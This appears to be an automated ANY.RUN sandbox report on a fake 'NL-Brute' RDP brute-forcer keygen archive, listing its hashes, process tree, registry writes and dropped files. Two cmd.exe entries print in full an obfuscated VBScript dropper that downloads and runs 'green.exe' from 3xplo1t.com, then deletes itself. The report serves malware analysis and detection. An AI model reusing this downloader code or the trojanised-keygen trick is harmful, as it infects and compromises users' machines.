File name:

NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

Full analysis: https://app.any.run/tasks/87da4e6e-8ebf-4e25-a2ce-5367add31653
Verdict: Malicious activity
Analysis date: November 20, 2018, 17:34:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

37398F3A62624CC800F8BD0FBDE14864

SHA1:

53FE5275EB42ED0D13E32ACEE6FC4411335984EE

SHA256:

08443ACA2D1C220360CA6409D7062995DD4C9034A90D26A19A73F670D2224E6D

SSDEEP:

196608:1+nirUSrXcsLhUP+tNLg9VR8hrPg/wnOPeZxNXYdsaysWfLBrcLvHfnrhm9:qirNXcsLtN09VRo6wnGUXYdsay/DBYvE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3360)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)

    • Executes scripts

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
      • cmd.exe (PID: 2836)
      • cmd.exe (PID: 2764)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3456)
      • WScript.exe (PID: 3308)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe nlbrute 1.2 x64 & vpn.exe wscript.exe no specs cmd.exe no specs wscript.exe no specs timeout.exe no specs nlbrute 1.2 x64.exe wscript.exe no specs cmd.exe no specs wscript.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1272"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1464timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2152"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2552timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2764"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXEC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2836"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXEC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3308"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js" C:\Windows\System32\WScript.exeNLBrute 1.2 x64.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3344"C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe" C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\nl-brute 1.2 x64 & 1.2 x64 vpn edition - keygen\nlbrute 1.2 x64.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
3360"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3456"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js" C:\Windows\System32\WScript.exeNLBrute 1.2 x64 & VPN.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 133
Read events
2 076
Write events
57
Delete events
0

Modification events

(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3360) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(3492) NLBrute 1.2 x64 & VPN.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
5
Suspicious files
1
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
3492NLBrute 1.2 x64 & VPN.exeC:\Users\admin\AppData\Local\Temp\autCF85.tmp
MD5:
SHA256:
3492NLBrute 1.2 x64 & VPN.exeC:\Users\admin\AppData\Local\Temp\autDD42.tmp
MD5:
SHA256:
3344NLBrute 1.2 x64.exeC:\Users\admin\AppData\Local\Temp\autABA.tmp
MD5:
SHA256:
3344NLBrute 1.2 x64.exeC:\Users\admin\AppData\Local\Temp\aut1847.tmp
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\key.txttext
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN.exeexecutable
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exeexecutable
MD5:
SHA256:
3492NLBrute 1.2 x64 & VPN.exeC:\Users\admin\AppData\Local\Temp\FA.jstext
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\settings.initext
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\a3e0dfcaa65540c2b2295df658e1294e.pngimage
MD5:D2C7DF27E3508AC727337D45CF64D105
SHA256:36C7B94542AE79E27F02324519467BD2850FE45B86675EBE6748D6B0D901B3CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
3xplo1t.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z